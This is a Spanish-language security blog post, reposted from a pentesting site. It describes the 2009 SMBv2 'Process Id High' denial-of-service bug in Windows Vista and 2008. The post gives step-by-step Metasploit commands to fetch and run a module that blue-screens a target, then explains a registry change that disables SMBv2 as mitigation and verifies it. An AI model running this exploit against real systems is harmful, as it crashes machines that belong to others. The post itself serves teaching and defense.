12 sept. 2009

Explotar BSoD con Metasploit

Como hace días salió el bug WinNuke (BSoD) de Windows 7 & Vista (el mítico pantallazo azul de la muerte), informado aquí:

Noticia:  Windows 7 permite ataques remotos que provocan un pantallazo azul (BSoD)

Modo de explotarlo: Como explotar el WinNuke (BSOD) de Windows 7 & Vista
 
Ahora www.pentester.es nos deleita y enseña como explotar la vulneravilidad con el metasploit:
La semana pasada todas las páginas webs de temática relacionada con la seguridad se hicieron eco de la publicación de una vulnerabilidad zero-day que afectaba a un mal procesamiento de los datos de entrada en el protocolo SMBv2, usado por Windows Vista y Windows 2008 para la utilización de recursos compartidos.

La vulnerabilidad consiste en la inserción de un caracter especial en el campo "Process Id High" de la cabecera SMB que provoca que la ejecución del proceso salte a una dirección de memoria fuera del espacio que tiene reservado, provocando un error y la inestabilidad del sistema, con el consiguiente pantallazo azul.

Según se ha publicado, ya existe un modulo del Metasploit Framework que aprovecha esta vulnerabilidad, así que no podiamos dejar la ocasión de probarlo, sin embargo, haciendo update de la metasploit como se suele hacer no aparece, así que tuvo que ser descargado "a mano":

# cd /pentest/exploits/framework3/modules/auxiliary/dos/windows/smb/
# wget http://trac.metasploit.com/export/7010/framework3/trunk/modules/auxiliary/dos/windows/smb/smb2_negotiate_pidhigh.rb

Ahora que ya lo tenemos ya en el directorio de nuestros exploits, vamos a la metasploit y a utilizarlo:

# cd /pentest/exploits/framework3/
# ./msfconsole
msf > use dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > show options
Module options:

Name           Current Setting      Required      Description
----           ---------------      --------      -----------
OFFSET         65535                yes           The function table offset to call
RHOST                               yes           The target address
RPORT          445                  yes           The target port

msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 172.16.24.141
RHOST => 172.16.24.141
msf auxiliary(smb2_negotiate_pidhigh) > exploit
[*] Auxiliary module execution completed


Como podemos ver, tenemos un bonito pantallazo azul, la máquina se reinicia y vuelve a arrancar.

En el caso de los Windows Vista puede que la solución para protegernos de esta vulnerabilidad sea más sencilla, únicamente hay que activar el firewall personal del Windows o desactivar los recursos compartidos hasta que sea publicado el parche y pueda aplicarse. De hecho, ¿para qué necesita un Windows Vista (siempre un workstation de un usuario) ofrecer recursos compartidos? Si no se va a usar para nada dejadlo activado (el firewall), ya que, además de este riesgo, existen numerosos riesgos asociados a malware que se propaga a través de este servicio.

Sin embargo, el caso de los Windows 2008 es un poco más complicado, ya que en muchas ocasiones la organización va a requerir que estos servicios se sigan ofreciendo, como por ejemplo en los servidores de ficheros. Para estos casos, veamos como podemos protegernos mientras Microsoft publica el parche:

1) Ejecutamos "regedit".
2) Buscamos la siguiente clave de registro: HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters
3) Creamos una clave llamada "Smb2" de tipo REG_DWORD a la que le asignamos valor "0" (cero) para deshabilitar el uso del protocolo SMBv2.
4) Reiniciamos el equipo para que los cambios surtan efecto.



Una vez cambiada la clave de registro y reniciado el equipo, volvemos a repetir el proceso de explotación de manera idéntica, obteniendo los siguientes resultados:



Como podemos ver, el Windows Vista sige como una rosa (como se puede apreciar en la imagen), por lo que hemos mitigado el riesgo de exposición al ataque de DoS por medio de la desactivación a nivel de registro del protocolo SMB v2, en el cual reside la vulnerabilidad.

No he podido realizar las mismas pruebas en un Windows 2008 por no disponer de licencias, pero la clave sería la misma y el proceso idéntico, solo que con mucho más cuidado...

¿Alguien se anima a probarlo y contarnoslo? Por supuesto, en un sistema de test primero, y cuando haya que hacerlo en producción guardar un backup de las claves de registro antes de tocarlas por si algo saliera mal y hubiera que restaurar.

Fuente: http://www.pentester.es/

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.